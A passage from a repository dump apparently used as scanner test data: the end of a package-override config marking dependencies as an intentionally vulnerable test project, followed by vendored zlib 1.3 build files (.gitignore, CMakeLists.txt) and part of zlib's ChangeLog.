ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "github.com/gogo/protobuf" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/.gitignore ================================================ *.diff *.patch *.orig *.rej *~ *.a *.lo *.o *.dylib *.gcda *.gcno *.gcov /example /example64 /examplesh /libz.so* /minigzip /minigzip64 /minigzipsh /zlib.pc /configure.log .DS_Store ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/CMakeLists.txt ================================================ cmake_minimum_required(VERSION 2.4.4...3.15.0) set(CMAKE_ALLOW_LOOSE_LOOP_CONSTRUCTS ON) project(zlib C) set(VERSION "1.3") set(INSTALL_BIN_DIR 
"${CMAKE_INSTALL_PREFIX}/bin" CACHE PATH "Installation directory for executables") set(INSTALL_LIB_DIR "${CMAKE_INSTALL_PREFIX}/lib" CACHE PATH "Installation directory for libraries") set(INSTALL_INC_DIR "${CMAKE_INSTALL_PREFIX}/include" CACHE PATH "Installation directory for headers") set(INSTALL_MAN_DIR "${CMAKE_INSTALL_PREFIX}/share/man" CACHE PATH "Installation directory for manual pages") set(INSTALL_PKGCONFIG_DIR "${CMAKE_INSTALL_PREFIX}/share/pkgconfig" CACHE PATH "Installation directory for pkgconfig (.pc) files") include(CheckTypeSize) include(CheckFunctionExists) include(CheckIncludeFile) include(CheckCSourceCompiles) enable_testing() check_include_file(sys/types.h HAVE_SYS_TYPES_H) check_include_file(stdint.h HAVE_STDINT_H) check_include_file(stddef.h HAVE_STDDEF_H) # # Check to see if we have large file support # set(CMAKE_REQUIRED_DEFINITIONS -D_LARGEFILE64_SOURCE=1) # We add these other definitions here because CheckTypeSize.cmake # in CMake 2.4.x does not automatically do so and we want # compatibility with CMake 2.4.x. if(HAVE_SYS_TYPES_H) list(APPEND CMAKE_REQUIRED_DEFINITIONS -DHAVE_SYS_TYPES_H) endif() if(HAVE_STDINT_H) list(APPEND CMAKE_REQUIRED_DEFINITIONS -DHAVE_STDINT_H) endif() if(HAVE_STDDEF_H) list(APPEND CMAKE_REQUIRED_DEFINITIONS -DHAVE_STDDEF_H) endif() check_type_size(off64_t OFF64_T) if(HAVE_OFF64_T) add_definitions(-D_LARGEFILE64_SOURCE=1) endif() set(CMAKE_REQUIRED_DEFINITIONS) # clear variable # # Check for fseeko # check_function_exists(fseeko HAVE_FSEEKO) if(NOT HAVE_FSEEKO) add_definitions(-DNO_FSEEKO) endif() # # Check for unistd.h # check_include_file(unistd.h Z_HAVE_UNISTD_H) if(MSVC) set(CMAKE_DEBUG_POSTFIX "d") add_definitions(-D_CRT_SECURE_NO_DEPRECATE) add_definitions(-D_CRT_NONSTDC_NO_DEPRECATE) include_directories(${CMAKE_CURRENT_SOURCE_DIR}) endif() if(NOT CMAKE_CURRENT_SOURCE_DIR STREQUAL CMAKE_CURRENT_BINARY_DIR) # If we're doing an out of source build and the user has a zconf.h # in their source tree... 
if(EXISTS ${CMAKE_CURRENT_SOURCE_DIR}/zconf.h) message(STATUS "Renaming") message(STATUS " ${CMAKE_CURRENT_SOURCE_DIR}/zconf.h") message(STATUS "to 'zconf.h.included' because this file is included with zlib") message(STATUS "but CMake generates it automatically in the build directory.") file(RENAME ${CMAKE_CURRENT_SOURCE_DIR}/zconf.h ${CMAKE_CURRENT_SOURCE_DIR}/zconf.h.included) endif() endif() set(ZLIB_PC ${CMAKE_CURRENT_BINARY_DIR}/zlib.pc) configure_file( ${CMAKE_CURRENT_SOURCE_DIR}/zlib.pc.cmakein ${ZLIB_PC} @ONLY) configure_file( ${CMAKE_CURRENT_SOURCE_DIR}/zconf.h.cmakein ${CMAKE_CURRENT_BINARY_DIR}/zconf.h @ONLY) include_directories(${CMAKE_CURRENT_BINARY_DIR} ${CMAKE_SOURCE_DIR}) #============================================================================ # zlib #============================================================================ set(ZLIB_PUBLIC_HDRS ${CMAKE_CURRENT_BINARY_DIR}/zconf.h zlib.h ) set(ZLIB_PRIVATE_HDRS crc32.h deflate.h gzguts.h inffast.h inffixed.h inflate.h inftrees.h trees.h zutil.h ) set(ZLIB_SRCS adler32.c compress.c crc32.c deflate.c gzclose.c gzlib.c gzread.c gzwrite.c inflate.c infback.c inftrees.c inffast.c trees.c uncompr.c zutil.c ) if(NOT MINGW) set(ZLIB_DLL_SRCS win32/zlib1.rc # If present will override custom build rule below. ) endif() # parse the full version number from zlib.h and include in ZLIB_FULL_VERSION file(READ ${CMAKE_CURRENT_SOURCE_DIR}/zlib.h _zlib_h_contents) string(REGEX REPLACE ".*#define[ \t]+ZLIB_VERSION[ \t]+\"([-0-9A-Za-z.]+)\".*" "\\1" ZLIB_FULL_VERSION ${_zlib_h_contents}) if(MINGW) # This gets us DLL resource information when compiling on MinGW. 
if(NOT CMAKE_RC_COMPILER) set(CMAKE_RC_COMPILER windres.exe) endif() add_custom_command(OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/zlib1rc.obj COMMAND ${CMAKE_RC_COMPILER} -D GCC_WINDRES -I ${CMAKE_CURRENT_SOURCE_DIR} -I ${CMAKE_CURRENT_BINARY_DIR} -o ${CMAKE_CURRENT_BINARY_DIR}/zlib1rc.obj -i ${CMAKE_CURRENT_SOURCE_DIR}/win32/zlib1.rc) set(ZLIB_DLL_SRCS ${CMAKE_CURRENT_BINARY_DIR}/zlib1rc.obj) endif(MINGW) add_library(zlib SHARED ${ZLIB_SRCS} ${ZLIB_DLL_SRCS} ${ZLIB_PUBLIC_HDRS} ${ZLIB_PRIVATE_HDRS}) add_library(zlibstatic STATIC ${ZLIB_SRCS} ${ZLIB_PUBLIC_HDRS} ${ZLIB_PRIVATE_HDRS}) set_target_properties(zlib PROPERTIES DEFINE_SYMBOL ZLIB_DLL) set_target_properties(zlib PROPERTIES SOVERSION 1) if(NOT CYGWIN) # This property causes shared libraries on Linux to have the full version # encoded into their final filename. We disable this on Cygwin because # it causes cygz-${ZLIB_FULL_VERSION}.dll to be created when cygz.dll # seems to be the default. # # This has no effect with MSVC, on that platform the version info for # the DLL comes from the resource file win32/zlib1.rc set_target_properties(zlib PROPERTIES VERSION ${ZLIB_FULL_VERSION}) endif() if(UNIX) # On unix-like platforms the library is almost always called libz set_target_properties(zlib zlibstatic PROPERTIES OUTPUT_NAME z) if(NOT APPLE) set_target_properties(zlib PROPERTIES LINK_FLAGS "-Wl,--version-script,\"${CMAKE_CURRENT_SOURCE_DIR}/zlib.map\"") endif() elseif(BUILD_SHARED_LIBS AND WIN32) # Creates zlib1.dll when building shared library version set_target_properties(zlib PROPERTIES SUFFIX "1.dll") endif() if(NOT SKIP_INSTALL_LIBRARIES AND NOT SKIP_INSTALL_ALL ) install(TARGETS zlib zlibstatic RUNTIME DESTINATION "${INSTALL_BIN_DIR}" ARCHIVE DESTINATION "${INSTALL_LIB_DIR}" LIBRARY DESTINATION "${INSTALL_LIB_DIR}" ) endif() if(NOT SKIP_INSTALL_HEADERS AND NOT SKIP_INSTALL_ALL ) install(FILES ${ZLIB_PUBLIC_HDRS} DESTINATION "${INSTALL_INC_DIR}") endif() if(NOT SKIP_INSTALL_FILES AND NOT SKIP_INSTALL_ALL ) 
install(FILES zlib.3 DESTINATION "${INSTALL_MAN_DIR}/man3") endif() if(NOT SKIP_INSTALL_FILES AND NOT SKIP_INSTALL_ALL ) install(FILES ${ZLIB_PC} DESTINATION "${INSTALL_PKGCONFIG_DIR}") endif() #============================================================================ # Example binaries #============================================================================ add_executable(example test/example.c) target_link_libraries(example zlib) add_test(example example) add_executable(minigzip test/minigzip.c) target_link_libraries(minigzip zlib) if(HAVE_OFF64_T) add_executable(example64 test/example.c) target_link_libraries(example64 zlib) set_target_properties(example64 PROPERTIES COMPILE_FLAGS "-D_FILE_OFFSET_BITS=64") add_test(example64 example64) add_executable(minigzip64 test/minigzip.c) target_link_libraries(minigzip64 zlib) set_target_properties(minigzip64 PROPERTIES COMPILE_FLAGS "-D_FILE_OFFSET_BITS=64") endif() ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/ChangeLog ================================================ ChangeLog file for zlib Changes in 1.3 (18 Aug 2023) - Remove K&R function definitions and zlib2ansi - Fix bug in deflateBound() for level 0 and memLevel 9 - Fix bug when gzungetc() is used immediately after gzopen() - Fix bug when using gzflush() with a very small buffer - Fix crash when gzsetparams() attempted for transparent write - Fix test/example.c to work with FORCE_STORED - Rewrite of zran in examples (see zran.c version history) - Fix minizip to allow it to open an empty zip file - Fix reading disk number start on zip64 files in minizip - Fix logic error in minizip argument processing - Add minizip testing to Makefile - Read multiple bytes instead of byte-by-byte in minizip unzip.c - Add memory sanitizer to configure (--memory) - Various portability improvements - Various documentation improvements - Various spelling and typo corrections Changes in 1.2.13 (13 Oct 
2022) - Fix configure issue that discarded provided CC definition - Correct incorrect inputs provided to the CRC functions - Repair prototypes and exporting of new CRC functions - Fix inflateBack to detect invalid input with distances too far - Have infback() deliver all of the available output up to any error - Fix a bug when getting a gzip header extra field with inflate() - Fix bug in block type selection when Z_FIXED used - Tighten deflateBound bounds - Remove deleted assembler code references - Various portability and appearance improvements Changes in 1.2.12 (27 Mar 2022) - Cygwin does not have _wopen(), so do not create gzopen_w() there - Permit a deflateParams() parameter change as soon as possible - Limit hash table inserts after switch from stored deflate - Fix bug when window full in deflate_stored() - Fix CLEAR_HASH macro to be usable as a single statement - Avoid a conversion error in gzseek when off_t type too small - Have Makefile return non-zero error code on test failure - Avoid some conversion warnings in gzread.c and gzwrite.c - Update use of errno for newer Windows CE versions - Small speedup to inflate [psumbera] - Return an error if the gzputs string length can't fit in an int - Add address checking in clang to -w option of configure - Don't compute check value for raw inflate if asked to validate - Handle case where inflateSync used when header never processed - Avoid the use of ptrdiff_t - Avoid an undefined behavior of memcpy() in gzappend() - Avoid undefined behaviors of memcpy() in gz*printf() - Avoid an undefined behavior of memcpy() in _tr_stored_block() - Make the names in functions declarations identical to definitions - Remove old assembler code in which bugs have manifested - Fix deflateEnd() to not report an error at start of raw deflate - Add legal disclaimer to README - Emphasize the need to continue decompressing gzip members - Correct the initialization requirements for deflateInit2() - Fix a bug that can crash deflate on some 
input when using Z_FIXED - Assure that the number of bits for deflatePrime() is valid - Use a structure to make globals in enough.c evident - Use a macro for the printf format of big_t in enough.c - Clean up code style in enough.c, update version - Use inline function instead of macro for index in enough.c - Clarify that prefix codes are counted in enough.c - Show all the codes for the maximum tables size in enough.c - Add gznorm.c example, which normalizes gzip files - Fix the zran.c example to work on a multiple-member gzip file - Add tables for crc32_combine(), to speed it up by a factor of 200 - Add crc32_combine_gen() and crc32_combine_op() for fast combines - Speed up software CRC-32 computation by a factor of 1.5 to 3 - Use atomic test and set, if available, for dynamic CRC tables - Don't bother computing check value after successful inflateSync() - Correct comment in crc32.c - Add use of the ARMv8 crc32 instructions when requested - Use ARM crc32 instructions if the ARM architecture has them - Explicitly note that the 32-bit check values are 32 bits - Avoid adding empty gzip member after gzflush with Z_FINISH - Fix memory leak on error in gzlog.c - Fix error in comment on the polynomial representation of a byte - Clarify gz* function interfaces, referring to parameter names - Change macro name in inflate.c to avoid collision in VxWorks - Correct typo in blast.c - Improve portability of contrib/minizip - Fix indentation in minizip's zip.c - Replace black/white with allow/block. (theresa-m) - minizip warning fix if MAXU32 already defined. (gvollant) - Fix unztell64() in minizip to work past 4GB. 
(Daniël Hörchner) - Clean up minizip to reduce warnings for testing - Add fallthrough comments for gcc - Eliminate use of ULL constants - Separate out address sanitizing from warnings in configure - Remove destructive aspects of make distclean - Check for cc masquerading as gcc or clang in configure - Fix crc32.c to compile local functions only if used Changes in 1.2.11 (15 Jan 2017) - Fix deflate stored bug when pulling last block from window - Permit immediate deflateParams changes before any deflate input Changes in 1.2.10 (2 Jan 2017) - Avoid warnings on snprintf() return value - Fix bug in deflate_stored() for zero-length input - Fix bug in gzwrite.c that produced corrupt gzip files - Remove files to be installed before copying them in Makefile.in - Add warnings when compiling with assembler code Changes in 1.2.9 (31 Dec 2016) - Fix contrib/minizip to permit unzipping with desktop API [Zouzou] - Improve contrib/blast to return unused bytes - Assure that gzoffset() is correct when appending - Improve compress() and uncompress() to support large lengths - Fix bug in test/example.c where error code not saved - Remedy Coverity warning [Randers-Pehrson] - Improve speed of gzprintf() in transparent mode - Fix inflateInit2() bug when windowBits is 16 or 32 - Change DEBUG macro to ZLIB_DEBUG - Avoid uninitialized access by gzclose_w() - Allow building zlib outside of the source directory - Fix bug that accepted invalid zlib header when windowBits is zero - Fix gzseek() problem on MinGW due to buggy _lseeki64 there - Loop on write() calls in gzwrite.c in case of non-blocking I/O - Add --warn (-w) option to ./configure for more compiler warnings - Reject a window size of 256 bytes if not using the zlib wrapper - Fix bug when level 0 used with Z_HUFFMAN or Z_RLE - Add --debug (-d) option to ./configure to define ZLIB_DEBUG - Fix bugs in creating a very large gzip header - Add uncompress2() function, which returns the input size used - Assure that deflateParams() will not 
switch functions mid-block - Dramatically speed up deflation for level 0 (storing) - Add gzfread(), duplicating the interface of fread() - Add gzfwrite(), duplicating the interface of fwrite() - Add deflateGetDictionary() function - Use snprintf() for later versions of Microsoft C - Fix *Init macros to use z_ prefix when requested - Replace as400 with os400 for OS/400 support [Monnerat] - Add crc32_z() and adler32_z() functions with size_t lengths - Update Visual Studio project files [AraHaan] Changes in 1.2.8 (28 Apr 2013) - Update contrib/minizip/iowin32.c for Windows RT [Vollant] - Do not force Z_CONST for C++ - Clean up contrib/vstudio [Roß] - Correct spelling error in zlib.h - Fix mixed line endings in contrib/vstudio Changes in 1.2.7.3 (13 Apr 2013) - Fix version numbers and DLL names in contrib/vstudio/*/zlib.rc Changes in 1.2.7.2 (13 Apr 2013) - Change check for a four-byte type back to hexadecimal - Fix typo in win32/Makefile.msc - Add casts in gzwrite.c for pointer differences Changes in 1.2.7.1 (24 Mar 2013) - Replace use of unsafe string functions with snprintf if available - Avoid including stddef.h on Windows for Z_SOLO compile [Niessink] - Fix gzgetc undefine when Z_PREFIX set [Turk] - Eliminate use of mktemp in Makefile (not always available) - Fix bug in 'F' mode for gzopen() - Add inflateGetDictionary() function - Correct comment in deflate.h - Use _snprintf for snprintf in Microsoft C - On Darwin, only use /usr/bin/libtool if libtool is not Apple - Delete "--version" file if created by "ar --version" [Richard G.] 
- Fix configure check for veracity of compiler error return codes - Fix CMake compilation of static lib for MSVC2010 x64 - Remove unused variable in infback9.c - Fix argument checks in gzlog_compress() and gzlog_write() - Clean up the usage of z_const and respect const usage within zlib - Clean up examples/gzlog.[ch] comparisons of different types - Avoid shift equal to bits in type (caused endless loop) - Fix uninitialized value bug in gzputc() introduced by const patches - Fix memory allocation error in examples/zran.c [Nor] - Fix bug where gzopen(), gzclose() would write an empty file - Fix bug in gzclose() when gzwrite() runs out of memory - Check for input buffer malloc failure in examples/gzappend.c - Add note to contrib/blast to use binary mode in stdio - Fix comparisons of differently signed integers in contrib/blast - Check for invalid code length codes in contrib/puff - Fix serious but very rare decompression bug in inftrees.c - Update inflateBack() comments, since inflate() can be faster - Use underscored I/O function names for WINAPI_FAMILY - Add _tr_flush_bits to the external symbols prefixed by --zprefix - Add contrib/vstudio/vc10 pre-build step for static only - Quote --version-script argument in CMakeLists.txt - Don't specify --version-script on Apple platforms in CMakeLists.txt - Fix casting error in contrib/testzlib/testzlib.c - Fix types in contrib/minizip to match result of get_crc_table() - Simplify contrib/vstudio/vc10 with 'd' suffix - Add TOP support to win32/Makefile.msc - Support i686 and amd64 assembler builds in CMakeLists.txt - Fix typos in the use of _LARGEFILE64_SOURCE in zconf.h - Add vc11 and vc12 build files to contrib/vstudio - Add gzvprintf() as an undocumented function in zlib - Fix configure for Sun shell - Remove runtime check in configure for four-byte integer type - Add casts and consts to ease user conversion to C++ - Add man pages for minizip and miniunzip - In Makefile uninstall, don't rm if preceding cd fails - Do not 
return Z_BUF_ERROR if deflateParam() has nothing to write Changes in 1.2.7 (2 May 2012) - Replace use of memmove() with a simple copy for portability - Test for existence of strerror - Restore gzgetc_ for backward compatibility with 1.2.6 - Fix build with non-GNU make on Solaris - Require gcc 4.0 or later on Mac OS X to use the hidden attribute - Include unistd.h for Watcom C - Use __WATCOMC__ instead of __WATCOM__ - Do not use the visibility attribute if NO_VIZ defined - Improve the detection of no hidden visibility attribute - Avoid using __int64 for gcc or solo compilation - Cast to char * in gzprintf to avoid warnings [Zinser] - Fix make_vms.com for VAX [Zinser] - Don't use library or built-in byte swaps - Simplify test and use of gcc hidden attribute - Fix bug in gzclose_w() when gzwrite() fails to allocate memory - Add "x" (O_EXCL) and "e" (O_CLOEXEC) modes support to gzopen() - Fix bug in test/minigzip.c for configure --solo - Fix contrib/vstudio project link errors [Mohanathas] - Add ability to choose the builder in make_vms.com [Schweda] - Add DESTDIR support to mingw32 win32/Makefile.gcc - Fix comments in win32/Makefile.gcc for proper usage - Allow overriding the default install locations for cmake - Generate and install the pkg-config file with cmake - Build both a static and a shared version of zlib with cmake - Include version symbols for cmake builds - If using cmake with MSVC, add the source directory to the includes - Remove unneeded EXTRA_CFLAGS from win32/Makefile.gcc [Truta] - Move obsolete emx makefile to old [Truta] - Allow the use of -Wundef when compiling or using zlib - Avoid the use of the -u option with mktemp - Improve inflate() documentation on the use of Z_FINISH - Recognize clang as gcc - Add gzopen_w() in Windows for wide character path names - Rename zconf.h in CMakeLists.txt to move it out of the way - Add source directory in CMakeLists.txt for building examples - Look in build directory for zlib.pc in CMakeLists.txt - Remove 
gzflags from zlibvc.def in vc9 and vc10 - Fix contrib/minizip compilation in the MinGW environment - Update ./configure for Solaris, support --64 [Mooney] - Remove -R. from Solaris shared build (possible security issue: -R. adds the current directory to the run-time library search path) - Avoid race condition for parallel make (-j) running example - Fix type mismatch between get_crc_table() and crc_table - Fix parsing of version with "-" in CMakeLists.txt [Snider, Ziegler] - Fix the path to zlib.map in CMakeLists.txt - Force the native libtool in Mac OS X to avoid GNU libtool [Beebe] - Add instructions to win32/Makefile.gcc for shared install [Torri] Changes in 1.2.6.1 (12 Feb 2012) - Avoid the use of the Objective-C reserved name "id" - Include io.h in gzguts.h for Microsoft compilers - Fix problem with ./configure --prefix and gzgetc macro - Include gz_header definition when compiling zlib solo - Put gzflags() functionality back in zutil.c - Avoid library header include in crc32.c for Z_SOLO - Use name in GCC_CLASSIC as C compiler for coverage testing, if set - Minor cleanup in contrib/minizip/zip.c [Vollant] - Update make_vms.com [Zinser] - Remove unnecessary gzgetc_ function - Use optimized byte swap operations for Microsoft and GNU [Snyder] - Fix minor typo in zlib.h comments [Rzesniowiecki] Changes in 1.2.6 (29 Jan 2012) - Update the Pascal interface in contrib/pascal - Fix function numbers for gzgetc_ in zlibvc.def files - Fix configure.ac for contrib/minizip [Schiffer] - Fix large-entry detection in minizip on 64-bit systems [Schiffer] - Have ./configure use the compiler return code for error indication - Fix CMakeLists.txt for cross compilation [McClure] - Fix contrib/minizip/zip.c for 64-bit architectures [Dalsnes] - Fix compilation of contrib/minizip on FreeBSD [Marquez] - Correct suggested usages in win32/Makefile.msc [Shachar, Horvath] - Include io.h for Turbo C / Borland C on all platforms [Truta] - Make version explicit in contrib/minizip/configure.ac [Bosmans] - Avoid warning for no encryption in 
contrib/minizip/zip.c [Vollant] - Minor cleanup in contrib/minizip/unzip.c [Vollant] - Fix bug when compiling minizip with C++ [Vollant] - Protect for long name and extra fields in contrib/minizip [Vollant] - Avoid some warnings in contrib/minizip [Vollant] - Add -I../.. -L../.. to CFLAGS for minizip and miniunzip - Add missing libs to minizip linker command - Add support for VPATH builds in contrib/minizip - Add an --enable-demos option to contrib/minizip/configure - Add the generation of configure.log by ./configure - Exit when required parameters not provided to win32/Makefile.gcc - Have gzputc return the character written instead of the argument - Use the -m option on ldconfig for BSD systems [Tobias] - Correct in zlib.map when deflateResetKeep was added Changes in 1.2.5.3 (15 Jan 2012) - Restore gzgetc function for binary compatibility - Do not use _lseeki64 under Borland C++ [Truta] - Update win32/Makefile.msc to build test/*.c [Truta] - Remove old/visualc6 given CMakefile and other alternatives - Update AS400 build files and documentation [Monnerat] - Update win32/Makefile.gcc to build test/*.c [Truta] - Permit stronger flushes after Z_BLOCK flushes - Avoid extraneous empty blocks when doing empty flushes - Permit Z_NULL arguments to deflatePending - Allow deflatePrime() to insert bits in the middle of a stream - Remove second empty static block for Z_PARTIAL_FLUSH - Write out all of the available bits when using Z_BLOCK - Insert the first two strings in the hash table after a flush Changes in 1.2.5.2 (17 Dec 2011) - fix ld error: unable to find version dependency 'ZLIB_1.2.5' - use relative symlinks for shared libs - Avoid searching past window for Z_RLE strategy - Assure that high-water mark initialization is always applied in deflate - Add assertions to fill_window() in deflate.c to match comments - Update python link in README - Correct spelling error in gzread.c - Fix bug in gzgets() for a concatenated empty gzip stream - Correct error in comment for 
gz_make() - Change gzread() and related to ignore junk after gzip streams - Allow gzread() and related to continue after gzclearerr() - Allow gzrewind() and gzseek() after a premature end-of-file - Simplify gzseek() now that raw after gzip is ignored - Change gzgetc() to a macro for speed (~40% speedup in testing) - Fix gzclose() to return the actual error last encountered - Always add large file support for windows - Include zconf.h for windows large file support - Include zconf.h.cmakein for windows large file support - Update zconf.h.cmakein on make distclean - Merge vestigial vsnprintf determination from zutil.h to gzguts.h - Clarify how gzopen() appends in zlib.h comments - Correct documentation of gzdirect() since junk at end now ignored - Add a transparent write mode to gzopen() when 'T' is in the mode - Update python link in zlib man page - Get inffixed.h and MAKEFIXED result to match - Add a ./config --solo option to make zlib subset with no library use - Add undocumented inflateResetKeep() function for CAB file decoding - Add --cover option to ./configure for gcc coverage testing - Add #define ZLIB_CONST option to use const in the z_stream interface - Add comment to gzdopen() in zlib.h to use dup() when using fileno() - Note behavior of uncompress() to provide as much data as it can - Add files in contrib/minizip to aid in building libminizip - Split off AR options in Makefile.in and configure - Change ON macro to Z_ARG to avoid application conflicts - Facilitate compilation with Borland C++ for pragmas and vsnprintf - Include io.h for Turbo C / Borland C++ - Move example.c and minigzip.c to test/ - Simplify incomplete code table filling in inflate_table() - Remove code from inflate.c and infback.c that is impossible to execute - Test the inflate code with full coverage - Allow deflateSetDictionary, inflateSetDictionary at any time (in raw) - Add deflateResetKeep and fix inflateResetKeep to retain dictionary - Fix gzwrite.c to accommodate reduced memory 
zlib compilation - Have inflate() with Z_FINISH avoid the allocation of a window - Do not set strm->adler when doing raw inflate - Fix gzeof() to behave just like feof() when read is not past end of file - Fix bug in gzread.c when end-of-file is reached - Avoid use of Z_BUF_ERROR in gz* functions except for premature EOF - Document gzread() capability to read concurrently written files - Remove hard-coding of resource compiler in CMakeLists.txt [Blammo] Changes in 1.2.5.1 (10 Sep 2011) - Update FAQ entry on shared builds (#13) - Avoid symbolic argument to chmod in Makefile.in - Fix bug and add consts in contrib/puff [Oberhumer] - Update contrib/puff/zeros.raw test file to have all block types - Add full coverage test for puff in contrib/puff/Makefile - Fix static-only-build install in Makefile.in - Fix bug in unzGetCurrentFileInfo() in contrib/minizip [Kuno] - Add libz.a dependency to shared in Makefile.in for parallel builds - Spell out "number" (instead of "nb") in zlib.h for total_in, total_out - Replace $(...) with `...` in configure for non-bash sh [Bowler] - Add darwin* to Darwin* and solaris* to SunOS\ 5* in configure [Groffen] - Add solaris* to Linux* in configure to allow gcc use [Groffen] - Add *bsd* to Linux* case in configure [Bar-Lev] - Add inffast.obj to dependencies in win32/Makefile.msc - Correct spelling error in deflate.h [Kohler] - Change libzdll.a again to libz.dll.a (!) 
in win32/Makefile.gcc - Add test to configure for GNU C looking for gcc in output of $cc -v - Add zlib.pc generation to win32/Makefile.gcc [Weigelt] - Fix bug in zlib.h for _FILE_OFFSET_BITS set and _LARGEFILE64_SOURCE not - Add comment in zlib.h that adler32_combine with len2 < 0 makes no sense - Make NO_DIVIDE option in adler32.c much faster (thanks to John Reiser) - Make stronger test in zconf.h to include unistd.h for LFS - Apply Darwin patches for 64-bit file offsets to contrib/minizip [Slack] - Fix zlib.h LFS support when Z_PREFIX used - Add updated as400 support (removed from old) [Monnerat] - Avoid deflate sensitivity to volatile input data - Avoid division in adler32_combine for NO_DIVIDE - Clarify the use of Z_FINISH with deflateBound() amount of space - Set binary for output file in puff.c - Use u4 type for crc_table to avoid conversion warnings - Apply casts in zlib.h to avoid conversion warnings - Add OF to prototypes for adler32_combine_ and crc32_combine_ [Miller] - Improve inflateSync() documentation to note indeterminacy - Add deflatePending() function to return the amount of pending output - Correct the spelling of "specification" in FAQ [Randers-Pehrson] - Add a check in configure for stdarg.h, use for gzprintf() - Check that pointers fit in ints when gzprint() compiled old style - Add dummy name before $(SHAREDLIBV) in Makefile [Bar-Lev, Bowler] - Delete line in configure that adds -L. libz.a to LDFLAGS [Weigelt] - Add debug records in assembler code [Londer] - Update RFC references to use http://tools.ietf.org/html/... 
[Li] - Add --archs option, use of libtool to configure for Mac OS X [Borstel] Changes in 1.2.5 (19 Apr 2010) - Disable visibility attribute in win32/Makefile.gcc [Bar-Lev] - Default to libdir as sharedlibdir in configure [Nieder] - Update copyright dates on modified source files - Update trees.c to be able to generate modified trees.h - Exit configure for MinGW, suggesting win32/Makefile.gcc - Check for NULL path in gz_open [Homurlu] Changes in 1.2.4.5 (18 Apr 2010) - Set sharedlibdir in configure [Torok] - Set LDFLAGS in Makefile.in [Bar-Lev] - Avoid mkdir objs race condition in Makefile.in [Bowler] - Add ZLIB_INTERNAL in front of internal inter-module functions and arrays - Define ZLIB_INTERNAL to hide internal functions and arrays for GNU C - Don't use hidden attribute when it is a warning generator (e.g. Solaris) Changes in 1.2.4.4 (18 Apr 2010) - Fix CROSS_PREFIX executable testing, CHOST extract, mingw* [Torok] - Undefine _LARGEFILE64_SOURCE in zconf.h if it is zero, but not if empty - Try to use bash or ksh regardless of functionality of /bin/sh - Fix configure incompatibility with NetBSD sh - Remove attempt to run under bash or ksh since have better NetBSD fix - Fix win32/Makefile.gcc for MinGW [Bar-Lev] - Add diagnostic messages when using CROSS_PREFIX in configure - Added --sharedlibdir option to configure [Weigelt] - Use hidden visibility attribute when available [Frysinger] Changes in 1.2.4.3 (10 Apr 2010) - Only use CROSS_PREFIX in configure for ar and ranlib if they exist - Use CROSS_PREFIX for nm [Bar-Lev] - Assume _LARGEFILE64_SOURCE defined is equivalent to true - Avoid use of undefined symbols in #if with && and || - Make *64 prototypes in gzguts.h consistent with functions - Add -shared load option for MinGW in configure [Bowler] - Move z_off64_t to public interface, use instead of off64_t - Remove ! 
from shell test in configure (not portable to Solaris) - Change +0 macro tests to -0 for possibly increased portability Changes in 1.2.4.2 (9 Apr 2010) - Add consistent carriage returns to readme.txt's in masmx86 and masmx64 - Really provide prototypes for *64 functions when building without LFS - Only define unlink() in minigzip.c if unistd.h not included - Update README to point to contrib/vstudio project files - Move projects/vc6 to old/ and remove projects/ - Include stdlib.h in minigzip.c for setmode() definition under WinCE - Clean up assembler builds in win32/Makefile.msc [Rowe] - Include sys/types.h for Microsoft for off_t definition - Fix memory leak on error in gz_open() - Symbolize nm as $NM in configure [Weigelt] - Use TEST_LDSHARED instead of LDSHARED to link test programs [Weigelt] - Add +0 to _FILE_OFFSET_BITS and _LFS64_LARGEFILE in case not defined - Fix bug in gzeof() to take into account unused input data - Avoid initialization of structures with variables in puff.c - Updated win32/README-WIN32.txt [Rowe] Changes in 1.2.4.1 (28 Mar 2010) - Remove the use of [a-z] constructs for sed in configure [gentoo 310225] - Remove $(SHAREDLIB) from LIBS in Makefile.in [Creech] - Restore "for debugging" comment on sprintf() in gzlib.c - Remove fdopen for MVS from gzguts.h - Put new README-WIN32.txt in win32 [Rowe] - Add check for shell to configure and invoke another shell if needed - Fix big fat stinking bug in gzseek() on uncompressed files - Remove vestigial F_OPEN64 define in zutil.h - Set and check the value of _LARGEFILE_SOURCE and _LARGEFILE64_SOURCE - Avoid errors on non-LFS systems when applications define LFS macros - Set EXE to ".exe" in configure for MINGW [Kahle] - Match crc32() in crc32.c exactly to the prototype in zlib.h [Sherrill] - Add prefix for cross-compilation in win32/makefile.gcc [Bar-Lev] - Add DLL install in win32/makefile.gcc [Bar-Lev] - Allow Linux* or linux* from uname in configure [Bar-Lev] - Allow ldconfig to be redefined in 
configure and Makefile.in [Bar-Lev] - Add cross-compilation prefixes to configure [Bar-Lev] - Match type exactly in gz_load() invocation in gzread.c - Match type exactly of zcalloc() in zutil.c to zlib.h alloc_func - Provide prototypes for *64 functions when building zlib without LFS - Don't use -lc when linking shared library on MinGW - Remove errno.h check in configure and vestigial errno code in zutil.h Changes in 1.2.4 (14 Mar 2010) - Fix VER3 extraction in configure for no fourth subversion - Update zlib.3, add docs to Makefile.in to make .pdf out of it - Add zlib.3.pdf to distribution - Don't set error code in gzerror() if passed pointer is NULL - Apply destination directory fixes to CMakeLists.txt [Lowman] - Move #cmakedefine's to a new zconf.in.cmakein - Restore zconf.h for builds that don't use configure or cmake - Add distclean to dummy Makefile for convenience - Update and improve INDEX, README, and FAQ - Update CMakeLists.txt for the return of zconf.h [Lowman] - Update contrib/vstudio/vc9 and vc10 [Vollant] - Change libz.dll.a back to libzdll.a in win32/Makefile.gcc - Apply license and readme changes to contrib/asm686 [Raiter] - Check file name lengths and add -c option in minigzip.c [Li] - Update contrib/amd64 and contrib/masmx86/ [Vollant] - Avoid use of "eof" parameter in trees.c to not shadow library variable - Update make_vms.com for removal of zlibdefs.h [Zinser] - Update assembler code and vstudio projects in contrib [Vollant] - Remove outdated assembler code contrib/masm686 and contrib/asm586 - Remove old vc7 and vc8 from contrib/vstudio - Update win32/Makefile.msc, add ZLIB_VER_SUBREVISION [Rowe] - Fix memory leaks in gzclose_r() and gzclose_w(), file leak in gz_open() - Add contrib/gcc_gvmat64 for longest_match and inflate_fast [Vollant] - Remove *64 